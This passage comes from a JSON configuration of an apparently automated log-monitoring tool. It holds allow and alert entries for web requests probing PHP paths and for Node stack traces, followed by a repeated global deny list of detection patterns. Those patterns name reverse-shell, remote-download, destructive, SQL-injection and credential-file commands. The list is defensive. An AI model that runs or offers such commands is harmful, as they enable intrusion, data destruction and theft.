"d2f8b0856eee18c194dd08344b684b21ebb0409a40d099aa5553cd673dcf736a", "source": "auto", "reason": "HTTP request to a PHP endpoint returning 404; could indicate probing or misconfigured route. Not an immediate attack, but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws84.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:41.060850098Z" }, "d394095c1fb2c42196e39037bdb8ca049ce49c919c4a3cdf4114ea2c262afc43": { "type": "hash", "value": "d394095c1fb2c42196e39037bdb8ca049ce49c919c4a3cdf4114ea2c262afc43", "source": "auto", "reason": "HTTP 404 for tfm.php path suggests probing or misconfigured resource; single event not clearly malicious but warrants attention", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET //tfm.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:20.024487239Z" }, "d4d52c9484c5d34f6100fe7dd0d98bd770216823d99e76e28b2c3011752373c5": { "type": "hash", "value": "d4d52c9484c5d34f6100fe7dd0d98bd770216823d99e76e28b2c3011752373c5", "source": "auto", "reason": "Request to wp-admin/install.php on a non-WordPress service with curl user agent and a 404, indicating probing or automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-admin/install.php HTTP/1.0\" 404 146 \"-\" \"curl/8.5.0\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T00:00:13.924754295Z" }, "d9fd189900dfd4a9374ff1fbba393131fc835e69bfe644848914495d4f13bb9f": { "type": "hash", "value": "d9fd189900dfd4a9374ff1fbba393131fc835e69bfe644848914495d4f13bb9f", "source": "auto", "reason": "Access to a PHP file returned 404, which can indicate probing for web scripts; not definitive but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws75.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:58.376441295Z" }, "da1c032e2b3b9844eaf9e70af7c91029b6a8d2df1b7672967c67229d1d84c095": { "type": "hash", "value": "da1c032e2b3b9844eaf9e70af7c91029b6a8d2df1b7672967c67229d1d84c095", "source": "auto", "reason": "HTTP 404 on a PHP file path (44.php) from a host may indicate probing for vulnerable or misnamed scripts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /44.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:01.621837243Z" }, "db427b94598379b9f9432e3094d07f06872e64afbd96fe0aa48bebfa38e82556": { "type": "hash", "value": "db427b94598379b9f9432e3094d07f06872e64afbd96fe0aa48bebfa38e82556", "source": "auto", "reason": "HTTP 404 on a PHP file (ws88.php) from an external IP; could indicate probing or misconfigured path. Not definitive malware but warrants alert.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws88.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:20.743429334Z" }, "dc59a7e9f20a92c10becb2e379b64b95d1e4724e18f85c02b7110e325b12a10f": { "type": "hash", "value": "dc59a7e9f20a92c10becb2e379b64b95d1e4724e18f85c02b7110e325b12a10f", "source": "auto", "reason": "HTTP GET to /okxh.php returning 404 suggests probing for PHP file or misconfigured path; could be automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /okxh.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:30.246440107Z" }, "dd114a2b22a9c42df7a6c46ebe12a9a7fb4bb9d49220ea6215b0ac16058b5cff": { "type": "hash", "value": "dd114a2b22a9c42df7a6c46ebe12a9a7fb4bb9d49220ea6215b0ac16058b5cff", "source": "auto", "reason": "Requests to /000.php are commonly probed files in web server scans; 404 plus PHP file target suggests a probe rather than legitimate traffic", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /000.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:20.18997249Z" }, "de3589090ca69c2359af10dc11429dead0ade9078bda387b037bd78428efebaf": { "type": "hash", "value": "de3589090ca69c2359af10dc11429dead0ade9078bda387b037bd78428efebaf", "source": "auto", "reason": "HTTP GET to a suspicious path (/666.php) returning 404, which is a common probe for php files or web shells.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /666.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:05.40553939Z" }, "e1bd1f267387c7561ee1d90e302ee0eebe19cb97145bdcb7c4095f18de4a8035": { "type": "hash", "value": "e1bd1f267387c7561ee1d90e302ee0eebe19cb97145bdcb7c4095f18de4a8035", "source": "auto", "reason": "HTTP 404 for a possibly targeted PHP file (hplfuns.php) from an internal host with an external IP in the log tail suggests probing for vulnerable scripts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /hplfuns.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:00.432025421Z" }, "e2a1357de497dff0331ee1ce9ea509e3c86f9beaa8cdcb9fe1a8d78769d13560": { "type": "hash", "value": "e2a1357de497dff0331ee1ce9ea509e3c86f9beaa8cdcb9fe1a8d78769d13560", "source": "auto", "reason": "HTTP 404 for /lib.php with external IP in request pattern commonly seen in probing or vulnerability scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /lib.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:01.739230299Z" }, "e329da6245bb074192c1e53edb3075d8486eee9fbbbd8434201980539298adc0": { "type": "hash", "value": "e329da6245bb074192c1e53edb3075d8486eee9fbbbd8434201980539298adc0", "source": "auto", "reason": "Access to a PHP file that returns 404 may indicate a probing or attempted discovery of insecure resources.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /56c53.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:24.468406838Z" }, "e39252180d62460dfc59e1f8575027ea3675b2750acc423e13e79b199984e3dd": { "type": "hash", "value": "e39252180d62460dfc59e1f8575027ea3675b2750acc423e13e79b199984e3dd", "source": "auto", "reason": "Access log shows a request to a random PHP file (8573.php) returning 404, which can indicate automated probing or vulnerability scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /\u003cNUM\u003e.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:41.052079478Z" }, "e4afc476f0436f74af26ccb77b637c5fa7e5eb04de818d8143158d579f20456b": { "type": "hash", "value": "e4afc476f0436f74af26ccb77b637c5fa7e5eb04de818d8143158d579f20456b", "source": "auto", "reason": "HTTP 404 for a PHP file could indicate probing for common sensitive files; not definitive but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /myfile.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:30.933797277Z" }, "e62cc95c13b0ef5610e0d11a4a79fa1ad0510df3e981ab8436e8ab6d67931c62": { "type": "hash", "value": "e62cc95c13b0ef5610e0d11a4a79fa1ad0510df3e981ab8436e8ab6d67931c62", "source": "auto", "reason": "HTTP 404 for /66.php from an external IP to the service, with internal client IP present; could indicate probing or accidental hit rather than normal usage.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /66.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:04.498687857Z" }, "e788b52f4fdbae61e3a7b5b877eb1fdeb155bee8e4cd0ccc295ced02ff2027dc": { "type": "hash", "value": "e788b52f4fdbae61e3a7b5b877eb1fdeb155bee8e4cd0ccc295ced02ff2027dc", "source": "auto", "reason": "HTTP 404 for a PHP file probe (grsiuk.php) can indicate scanning for vulnerable PHP scripts; not confirmed malicious but warrants alerting.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /grsiuk.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:35.750495243Z" }, "f26ee6537e55d21790f17ca10cdbd59a988e9db5ceaf3d5d1fb4b37442c90a67": { "type": "hash", "value": "f26ee6537e55d21790f17ca10cdbd59a988e9db5ceaf3d5d1fb4b37442c90a67", "source": "auto", "reason": "HTTP 404 for /abc.php from client IPs suggests probing for common vulnerable files; not definitively malicious but warrants scrutiny.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /abc.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:03.443700944Z" }, "f4e37674d79fe5ef4d0c15270d7545bdd0b4861fad284d882f2ed5522037ea91": { "type": "hash", "value": "f4e37674d79fe5ef4d0c15270d7545bdd0b4861fad284d882f2ed5522037ea91", "source": "auto", "reason": "Access to a non-existent PHP file (wwx.php) returning 404, across a web service, suggests probing or unwanted scanning activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wwx.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:57.198415884Z" }, "f6ffd4f5866443f241c72466c86458690b9af2f0d1d8e9f4fa7d36de5e9e9cbc": { "type": "hash", "value": "f6ffd4f5866443f241c72466c86458690b9af2f0d1d8e9f4fa7d36de5e9e9cbc", "source": "auto", "reason": "HTTP 404 for a PHP file path from an external IP suggests possible probing or accidental exposure; not definitive malware but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /zc-104.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:13.348934667Z" }, "f7f5ddadd383dce6fcbf7e9dd9999382e96776130f6e3ad6ad9127bfbf09263f": { "type": "hash", "value": "f7f5ddadd383dce6fcbf7e9dd9999382e96776130f6e3ad6ad9127bfbf09263f", "source": "auto", "reason": "HTTP 404 on /init.php with external IP in log suggests probing for initialization or default PHP file commonly targeted during scans", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /init.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:15.944312768Z" }, "fb02fbe2710b25e2ed89bfd31071aab311720a2071e9582966430b64bd7988fc": { "type": "hash", "value": "fb02fbe2710b25e2ed89bfd31071aab311720a2071e9582966430b64bd7988fc", "source": "auto", "reason": "HTTP GET to jga.php returning 404 from an external IP could indicate probing for common PHP entrypoints.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /jga.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:56.197573566Z" }, "fc3e9b0895f94a7527a37ea827678a1c9081c782b9599661134206e727735d08": { "type": "hash", "value": "fc3e9b0895f94a7527a37ea827678a1c9081c782b9599661134206e727735d08", "source": "auto", "reason": "GET request for /d12.php resulting in 404; may indicate probing for PHP files or common exploits.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /d12.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:43.330724132Z" } } }, "suppress": {} }, "docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42": { "allow": { "hashes": { "8011d5d6f54ba328343e77230033b7c8245442da632bb698ef8205a942729d28": { "type": "hash", "value": "8011d5d6f54ba328343e77230033b7c8245442da632bb698ef8205a942729d28", "source": "auto", "reason": " commonplace request for robots.txt returning 404; appears to be normal web crawler probe with a typical short latency", "original_line": "GET /robots.txt 404 - - 13.338 ms", "created_at": "2026-03-20T15:47:01.71179616Z" }, "9fa980ea616bb859b8f07f7ba5ca3a342351ccb0e9b397c1cb8ecc49120c8323": { "type": "hash", "value": "9fa980ea616bb859b8f07f7ba5ca3a342351ccb0e9b397c1cb8ecc49120c8323", "source": "auto", "reason": "Regular HTTP access log line with a successful 200 response and a measurable duration.", "original_line": "GET / 200 - - 13.526 ms", "created_at": "2026-03-20T15:46:21.465835747Z" }, "c75ed85dda951f7933c4008614032d986776faf062e17ad3454a1b3245b63834": { "type": "hash", "value": "c75ed85dda951f7933c4008614032d986776faf062e17ad3454a1b3245b63834", "source": "auto", "reason": "Normal HTTP access log entry indicating a simple GET request to the root path with a 200 response", "original_line": "GET / 200 - - 7.005 ms", "created_at": "2026-03-20T15:47:04.969561936Z" }, "e3954457bfe80eb52150d3b571abae8b3e252bfb6d83e1093eaf8165bb5add31": { "type": "hash", "value": "e3954457bfe80eb52150d3b571abae8b3e252bfb6d83e1093eaf8165bb5add31", "source": "auto", "reason": "Stack trace line from a Node.js application referencing a Remix router module; appears to be normal debugging information rather than an attack.", "original_line": "at Object.query (/app/node_modules/@remix-run/router/dist/router.cjs.js:\u003cNUM\u003e:19)", "created_at": "2026-03-20T15:46:47.015687117Z" }, "e893ed8db86cbe312cdc835d2a3bb4cbb2eb790a4bf046b9ceedcedf4cfd5efe": { "type": "hash", "value": "e893ed8db86cbe312cdc835d2a3bb4cbb2eb790a4bf046b9ceedcedf4cfd5efe", "source": "auto", "reason": "Stack trace line pointing to a local node module file and line/column; typical during runtime errors, not clearly malicious", "original_line": "at /app/node_modules/@remix-run/express/dist/server.js:41:28", "created_at": "2026-03-20T15:46:58.42915173Z" }, "f74e03987c86508da7ba151f17d8afc63a8aafac35e98fa61218a31e61dd5757": { "type": "hash", "value": "f74e03987c86508da7ba151f17d8afc63a8aafac35e98fa61218a31e61dd5757", "source": "auto", "reason": "Normal stack trace line from a Node.js/Remix server indicating a request handler invocation; not indicative of an error or attack by itself.", "original_line": "at requestHandler (/app/node_modules/@remix-run/server-runtime/dist/server.js:160:24)", "created_at": "2026-03-20T15:46:52.864071122Z" }, "f8311c49a0ccdb4399c4d8ccb978e014e4a6481805281d89828d95eb2c069eff": { "type": "hash", "value": "f8311c49a0ccdb4399c4d8ccb978e014e4a6481805281d89828d95eb2c069eff", "source": "auto", "reason": "Normal stack trace from a Node.js app referencing an internal router error location within node_modules", "original_line": "at getInternalRouterError (/app/node_modules/@remix-run/router/dist/router.cjs.js:\u003cNUM\u003e:59)", "created_at": "2026-03-20T15:46:43.773244922Z" } } }, "deny": {}, "alert": { "hashes": { "d0171123bccdccc9f25d1971dc5df3d3a6957d9eb80b830143b01b050fc01b8a": { "type": "hash", "value": "d0171123bccdccc9f25d1971dc5df3d3a6957d9eb80b830143b01b050fc01b8a", "source": "auto", "reason": "A stack trace line indicating a runtime exception in a Node.js Remix server path. Could indicate a failed request handling but not inherently malicious.", "original_line": "at handleDocumentRequest (/app/node_modules/@remix-run/server-runtime/dist/server.js:275:35)", "created_at": "2026-03-20T15:46:50.740662819Z" }, "f59fd51a011e840d91a42bde2affde4a23eda8a81d8145e671db5c4e1e73a1e2": { "type": "hash", "value": "f59fd51a011e840d91a42bde2affde4a23eda8a81d8145e671db5c4e1e73a1e2", "source": "auto", "reason": "Error indicating a missing route for a common path (/robots.txt) could indicate misconfiguration or probing; not definitive malicious activity but warrants attention.", "original_line": "Error: No route matches URL \"/robots.txt\"", "created_at": "2026-03-20T15:46:38.395335937Z" } } }, "suppress": {} }, "docker:srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf": { "allow": { "hashes": { "42035d7b7b371c741249acf2d2ddedd08ce4df6117152a2435e7384e314f585d": { "type": "hash", "value": "42035d7b7b371c741249acf2d2ddedd08ce4df6117152a2435e7384e314f585d", "source": "auto", "reason": "HTTP 403 on robots.txt from a client (possibly a bot) is a normal web server event; no obvious malicious activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /robots.txt HTTP/1.1\" 403 325 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/\u003cIP\u003e Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:09:30.678932406Z" }, "9c2023c16f8b8481f6ffb59d9e9286efbed29509a1eaa6f217e8e4a5259c4c40": { "type": "hash", "value": "9c2023c16f8b8481f6ffb59d9e9286efbed29509a1eaa6f217e8e4a5259c4c40", "source": "auto", "reason": "Normal HTTP GET request to root with a 307 redirect and a GPTBot user agent. No anomaly detected.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET / HTTP/1.1\" 307 69 \"-\" \"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:09:38.410530476Z" } } }, "deny": {}, "alert": {}, "suppress": {} } }, "global": { "allow": {}, "deny": { "contains": [ { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T22:22:13.842170663Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T22:22:13.842171328Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T22:22:13.842171755Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T22:22:13.842172061Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T22:22:13.842172311Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T22:22:13.842172797Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T22:22:13.842172981Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T22:22:13.842173165Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T22:22:13.842173348Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T22:22:13.842173711Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T22:22:13.842173868Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T22:22:13.842179273Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T22:22:13.842182073Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T22:22:13.842182238Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T22:22:13.842182398Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T22:22:13.842182581Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:22:13.842182768Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:22:13.842183307Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T22:22:13.842183461Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T22:22:13.842183617Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T22:22:13.842183767Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-19T22:22:13.842183897Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T22:22:13.842184052Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T22:22:13.842184205Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T22:24:36.157920304Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T22:24:36.157921019Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T22:24:36.157921196Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T22:24:36.157921428Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T22:24:36.157921595Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T22:24:36.157921811Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T22:24:36.157921989Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T22:24:36.157922169Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T22:24:36.157922335Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T22:24:36.157929703Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T22:24:36.157929854Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T22:24:36.157930113Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T22:24:36.157930274Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T22:24:36.157930419Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T22:24:36.157930598Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T22:24:36.157930769Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:24:36.157930956Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:24:36.157931119Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T22:24:36.157931286Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T22:24:36.157931479Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T22:24:36.157931659Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-19T22:24:36.157931836Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T22:24:36.15793201Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T22:24:36.1579322Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T22:42:31.477004744Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T22:42:31.477005127Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T22:42:31.477005273Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T22:42:31.47700541Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T22:42:31.477005544Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T22:42:31.477005666Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T22:42:31.477005783Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T22:42:31.477005901Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T22:42:31.477006021Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T22:42:31.477006215Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T22:42:31.477006336Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T22:42:31.477006455Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T22:42:31.477006574Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T22:42:31.477006695Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T22:42:31.477006813Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T22:42:31.47700693Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:42:31.477007048Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:42:31.477007576Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T22:42:31.477007698Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T22:42:31.477007816Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T22:42:31.477007933Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": "2026-03-19T22:42:31.47700805Z" }, { "type": "contains", "value": "crontab -e", "source": "seeded", "reason": "Cron job modification", "created_at": "2026-03-19T22:42:31.477008167Z" }, { "type": "contains", "value": "iptables -F", "source": "seeded", "reason": "Firewall flush", "created_at": "2026-03-19T22:42:31.477008285Z" }, { "type": "contains", "value": "rm -rf /", "source": "seeded", "reason": "Destructive filesystem command", "created_at": "2026-03-19T22:43:15.187256306Z" }, { "type": "contains", "value": "chmod 777", "source": "seeded", "reason": "Overly permissive file permissions", "created_at": "2026-03-19T22:43:15.187256759Z" }, { "type": "contains", "value": "/etc/shadow", "source": "seeded", "reason": "Shadow password file access", "created_at": "2026-03-19T22:43:15.187256931Z" }, { "type": "contains", "value": "/etc/passwd", "source": "seeded", "reason": "Password file access", "created_at": "2026-03-19T22:43:15.187257056Z" }, { "type": "contains", "value": "reverse shell", "source": "seeded", "reason": "Reverse shell keyword", "created_at": "2026-03-19T22:43:15.187257172Z" }, { "type": "contains", "value": "nc -e /bin/sh", "source": "seeded", "reason": "Netcat reverse shell", "created_at": "2026-03-19T22:43:15.187257291Z" }, { "type": "contains", "value": "bash -i \u003e\u0026 /dev/tcp", "source": "seeded", "reason": "Bash reverse shell", "created_at": "2026-03-19T22:43:15.187257409Z" }, { "type": "contains", "value": "curl | sh", "source": "seeded", "reason": "Remote code execution via curl pipe", "created_at": "2026-03-19T22:43:15.187257527Z" }, { "type": "contains", "value": "wget | sh", "source": "seeded", "reason": "Remote code execution via wget pipe", "created_at": "2026-03-19T22:43:15.187257644Z" }, { "type": "contains", "value": "base64 -d | bash", "source": "seeded", "reason": "Encoded command execution", "created_at": "2026-03-19T22:43:15.187257761Z" }, { "type": "contains", "value": "python -c 'import socket", "source": "seeded", "reason": "Python reverse shell", "created_at": "2026-03-19T22:43:15.187257879Z" }, { "type": "contains", "value": "perl -e 'use Socket", "source": "seeded", "reason": "Perl reverse shell", "created_at": "2026-03-19T22:43:15.187257995Z" }, { "type": "contains", "value": "phpinfo()", "source": "seeded", "reason": "PHP information disclosure", "created_at": "2026-03-19T22:43:15.187258114Z" }, { "type": "contains", "value": "../../etc/passwd", "source": "seeded", "reason": "Path traversal attack", "created_at": "2026-03-19T22:43:15.187258232Z" }, { "type": "contains", "value": "UNION SELECT", "source": "seeded", "reason": "SQL injection", "created_at": "2026-03-19T22:43:15.187258349Z" }, { "type": "contains", "value": "DROP TABLE", "source": "seeded", "reason": "SQL injection / destructive query", "created_at": "2026-03-19T22:43:15.187258466Z" }, { "type": "contains", "value": "; ls -la", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:43:15.187258626Z" }, { "type": "contains", "value": "\u0026\u0026 cat /etc", "source": "seeded", "reason": "Command injection", "created_at": "2026-03-19T22:43:15.187258742Z" }, { "type": "contains", "value": "curl ifconfig.me", "source": "seeded", "reason": "External IP reconnaissance", "created_at": "2026-03-19T22:43:15.187258859Z" }, { "type": "contains", "value": "wget -q -O-", "source": "seeded", "reason": "Stealthy remote download", "created_at": "2026-03-19T22:43:15.187258977Z" }, { "type": "contains", "value": ".bash_history", "source": "seeded", "reason": "History file access", "created_at": "2026-03-19T22:43:15.187259094Z" }, { "type": "contains", "value": "authorized_keys", "source": "seeded", "reason": "SSH key manipulation", "created_at": 